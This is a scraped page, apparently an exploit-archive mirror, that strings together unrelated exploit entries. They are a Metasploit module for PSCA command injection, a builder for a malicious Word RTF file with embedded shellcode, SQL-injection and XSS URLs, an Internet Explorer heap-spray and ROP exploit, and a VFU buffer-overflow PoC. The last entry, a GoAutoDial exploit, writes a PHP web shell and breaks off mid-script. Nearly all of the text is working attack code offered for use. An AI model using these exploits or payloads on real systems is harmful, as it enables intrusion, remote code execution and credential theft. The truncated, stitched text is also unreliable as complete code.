HireHackking

# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability # Date: 2014-10-01 # Exploit Author: Ben Turner # Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/ # Version: 7.9, 8.1, 9.0, 9.1 # Tested on: Windows XP, Windows 7, Server 2003 and Server 2008 # CVE-2015-1497 # CVSS: 10 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # Exploit mixins should be called first include Msf::Exploit::Remote::SMB include Msf::Exploit::EXE include Msf::Auxiliary::Report # Aliases for common classes SIMPLE = Rex::Proto::SMB::Client XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants def initialize super( 'Name' => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability', 'Description' => %Q{ This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. }, 'Author' => [ 'Ben Turner' ], 'License' => BSD_LICENSE, 'References' => [ ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'process' }, 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Platform' => ['win'], 'Targets' => [ [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'January 10 2014' ) register_options([ OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']), OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']), Opt::RPORT(3465), ], self.class) end def exploit createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\"" createservice << "\x22\x00\x00\x00" startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" startservice << "Nvdkit service start test" startservice << "\x22\x00\x00\x00" removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" removeservice << "Nvdkit service remove test" removeservice << "\x22\x00\x00\x00" def filedrop() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") exe = generate_payload_exe fd = smb_open("\\installservice.exe", 'rwct') fd << exe fd.close self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end def filetest() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") file = "\\installservice.exe" filetest = smb_file_exist?(file) if filetest print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n") else print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!") end self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end begin filedrop() filetest() connect() sock.put(createservice) print_status("Creating the callback payload and installing the remote service") disconnect sleep(5) connect() sock.put(startservice) print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service") disconnect sleep(30) connect sock.put(removeservice) disconnect rescue ::Exception => e print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n") abort() end end end

# Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass # Date : 28/02/2015 # Author : R-73eN # Software : Microsoft Office Word 2007 # Tested : Windows 7 Starter import sys # Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode . shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7' #filecontent content="{\\rtf1" content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}" content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par" content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par" content+="{\\object\\objocx" content+="{\\*\\objdata" content+="\n" content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000" content+="00000000000000000E0000" content+="\n" content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000" content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF" content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400" content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000" content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628" content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00" content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000" content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000" content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000" content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF" content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000" content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000" content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF" content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000" content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000" content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000" content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400" content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000" content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600" content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080" content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974" content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000" content+="000000000000" content+= 'cb818278'# Address=788281CB jmp esp | {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll) content+="9090909090909090" #nops content+= shellcode #junk content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000" content+="\n" content+="}" content+="}" content+="}" banner = "\n\n" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_|[] /_/ \_\_____|\n\n" print banner if(len(sys.argv) < 2): print '\n Usage : exploit.py filename.rtf' else: filename = sys.argv[1] f=open(filename,"w") f.write(content) f.close() print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'

source: https://www.securityfocus.com/bid/49948/info vtiger CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected. http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1-- http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2-- http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5-- http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4--

source: https://www.securityfocus.com/bid/49964/info Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. <html> <head> </head> <body> <script type="text/javascript"> <!-- //originally, windows 7 compatible calc.exe shellcode from SkyLined var scode = "removed"; var newstack,newstackaddr; var fakeobj; var spray,spray2,selarray,readindex,readaddr,optarryaddr; var elms = new Array(); var optarray; var mshtmlbase; //option object that is to be corrupted var corruptedoption; var corruptedoptionaddr; var corruptaddr; function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); } function inttostr(num) { return String.fromCharCode(num%65536,Math.floor(num/65536)); } function crash() { var o = new Option(); selarray[99].options.add(o,-0x20000000); } function readmem(addr) { if(addr < readaddr) alert("Error, can't read that address"); return strtoint(spray[readindex].substr((addr-readaddr)/2,2)); } function readmem2(addr,size) { if(addr < readaddr) alert("Error, can't read that address"); return spray[readindex].substr((addr-readaddr)/2,size/2); } function overwrite(addr) { try { var index = (addr-optarryaddr)/4 - 0x40000000; selarray[99].options.add(optarray.pop(),index); } catch(err) {} } function getreadaddr() { readaddr = 0; var indexarray = new Array(); var tmpaddr = 0; var i,index; index = readmem(tmpaddr); indexarray.push(index); while(1) { tmpaddr += 0x100000; index = readmem(tmpaddr); for(i=0;i<indexarray.length;i++) { if(indexarray[i]==index+1) { readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24; return 1; } else if(indexarray[i]==index-1) { readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24; return 1; } } indexarray.push(index); } } //leverages the vulnerability into memory disclosure function initread() { //overwrite something in a heap spray slide try { selarray[99].options.add(optarray.pop(),-100000000/4); } catch(err) {} //now find what and where exectly did we overwrite readindex = -1; var i; for(i=1;i<200;i++) { if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2)) { readindex = i; break; } } if(readindex == -1) { alert("Error overwriring first spray"); return 0; } var start=2,len=spray[readindex].length-2,mid; while(len>10) { mid = Math.round(len/2); mid = mid - mid%2; if(spray[readindex].substr(start,mid) != spray[readindex-1].substr(start,mid)) { len = mid; } else { start = start+mid; len = len-mid; //if(spray[readindex].substr(start,mid) == spray[readindex-1].substr(start,mid)) alert("error"); } } for(i=start;i<(start+20);i=i+2) { if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) { break; } } //overwrite the string length try { selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1); } catch(err) {} if(spray[readindex].length == spray[readindex-1].length) alert("error overwriting string length"); //readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24; getreadaddr(); optarryaddr = readaddr + 100000000 + i*2; return 1; } function trysploit() { //create some helper objects for(var i =0; i < 100; i++) { elms.push(document.createElement('div')); } //force the option cache to rebuild itself var tmp1 = selarray[99].options[70].text; //overwrite the CTreeNode pointer overwrite(corruptaddr); //read the address of the option object we overwrited with var optadr = readmem(corruptaddr); //delete the option object... selarray[99].options.remove(0); CollectGarbage(); //...and allocate some strings in its place for(var i = 0; i < elms.length; i++) { elms[i].className = fakeobj; } //verify we overwrote the deleted option object successfully if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0; alert("success, calc.exe should start once you close this message box"); //now do something with the corrupted option object corruptedoption.parentNode.click(); } function hs() { //first heap spray, nop slide + shellcode spray = new Array(200); var pattern = unescape("%u0C0C%u0C0C"); while(pattern.length<(0x100000/2)) pattern+=pattern; pattern = pattern.substr(0,0x100000/2-0x100); for(var i=0;i<200;i++) { spray[i] = [inttostr(i)+pattern+scode].join(""); } //fill small gaps, we wan everything _behind_ our heap spray so that we can read it var asmall = new Array(10000); pattern = "aaaa"; while(pattern.length<500) pattern+=pattern; for(var i=0;i<10000;i++) { asmall[i]=[pattern+pattern].join(""); } //create some select and option elements selarray = new Array(100); for(var i=0;i<100;i++) { selarray[i] = document.createElement("select"); for(var j=0;j<100;j++) { var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo"); selarray[i].options.add(o,0); } } //create some extra option elements optarray = new Array(10000); for(var i=0;i<10000;i++) { optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo"); } //enable memory disclosure if(initread()==0) return; //force the option cache to rebuild itself var tmp1 = selarray[99].options[60].text; //get the address of some option element to be corrupted, also remove it from its select element, we don't want anything else messing with it corruptedoptionaddr = readmem(optarryaddr+60*4); corruptedoption = selarray[99].options[60]; selarray[99].options.remove(60); //get the base address of mshtml.dll based on the vtable address inside the option object mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0; alert("base address of mshtml.dll : " + mshtmlbase.toString(16)); //we'll overwrite the pointer to the CTreeNode object, compute its address corruptaddr = corruptedoptionaddr+0x14; //second heap-spray, this one will act as a stack (we'll exchange stack pointer with a pointer into this) spray2 = new Array(200); //some address that is likely to be inside the "stack" newstackaddr = optarryaddr+100000000; newstackaddr-=newstackaddr%0x1000; newstackaddr+=0x24; //assemble the "stack" so that it calls VirtualProtect on the firs shellcode and then jumps into it through return-oriented-programming newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F); while(newstack.length<(0x1000/2)) newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA"); newstack = newstack.substr(0,0x1000/2); while(newstack.length<(0x100000/2)) newstack+=newstack; newstack = newstack.substr(0,0x100000/2-0x100); for(var i=0;i<200;i++) { spray2[i] = [newstack].join(""); } //constract a fake object which will replace a deleted option object (it has to be the same size) //fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); //loop until we either achieve command execution or fail for(var i=0;i<100;i++) { trysploit(); } alert("Exploit failed, try again"); } hs(); --> </script> </body> </html>

source: https://www.securityfocus.com/bid/50001/info Active CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Active CMS 1.2.0 is vulnerable; other versions may also be affected. http://www.example.com/activecms/admin/admin?action=module&mod=&#039;<script>alert(document.cookie)</script>

source: https://www.securityfocus.com/bid/49997/info Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36211.zip

# Exploit Title: VFU Move Entry Buffer Overflow # Date: 2015-02-25 # Exploit Author: Bas van den Berg -- @barrebas # Vendor Homepage: http://cade.datamax.bg/ # Software Link: http://cade.datamax.bg/vfu/#download # Version: 4.10-1.1 # Tested on: GNU/Linux Kali 1.09 32-bit & Crunchbang 11 Waldorf (based on Debian Wheezy), kernel 3.2.0-4 # VFU 4.10 (probably up to 4.14) contains a buffer overflow when a user # moves a file entry around with a large filename. To trigger this # vulnerability, extensive user interaction is required. # Steps to reproduce the bug: create a file with a large (>115 # characters), run VFU and select 'A' and then 'V' to move the large # file entry around. Upon confirming the entry move, VFU crashes due to # a buffer overflow in this function: ''' void vfu_file_entry_move() { char t[128]; sprintf( t, "MOVE/REORDER File entry: %s", files_list[FLI]->name() ); say1( t ); say2( "Use Up/Down Arrows to reorder, ESC,ENTER when done." ); ''' # This overflow allows execution of arbitrary commands with the # privilege of the current user. The attached PoC demonstrates this. It # drops two files: the large filename and a shellscript that allows # arbitrary command execution. Usage: $ python vfu-move-entry-poc.py import struct import os def p(x): return struct.pack('<L', x & 0xffffffff) with open('./vstring.h', 'w') as f: f.write('#!/bin/sh\ntouch pwned') f.close() os.chmod('./vstring.h', 0755) payload = "A"*115 payload += p(0x8049ca0) # system@plt payload += p(0x804a260) # exit@plt payload += p(0x8088e44) # -> ./vstring.h open(payload, 'w').close()

# Title : GoAutoDial CE 2.0 Shell Upload # Date : 28/02/2015 # Author : R-73eN # Software : GoAutoDial CE 2.0 # Tested : On Linux vicisrv.loc 2.6.18-238.9.1.el5.goPAE #1 GoAutoDial CE 2.0 import socket import sys banner = "\n\n" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner CRLF = "\r\n" def checkvuln(): command = "uname" evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((host,80)) evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF s.send(evilREQ) a = s.recv(1024) if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Linux") != -1): print '[ + ] Server Is vulnerable [ + ]\n' shellupload() else: print '[ - ] Server is not vulnerable [ - ]\n' s.close() def shellupload(): command = "echo 'Infogen-AL<br><?php echo system($_GET['cmd']);?>' > /var/www/html/infogen.php" #command = "rm /var/www/html/123.pl;rm /var/www/html/TEST.perl" command = command.replace(" ", "%20") evil = path + 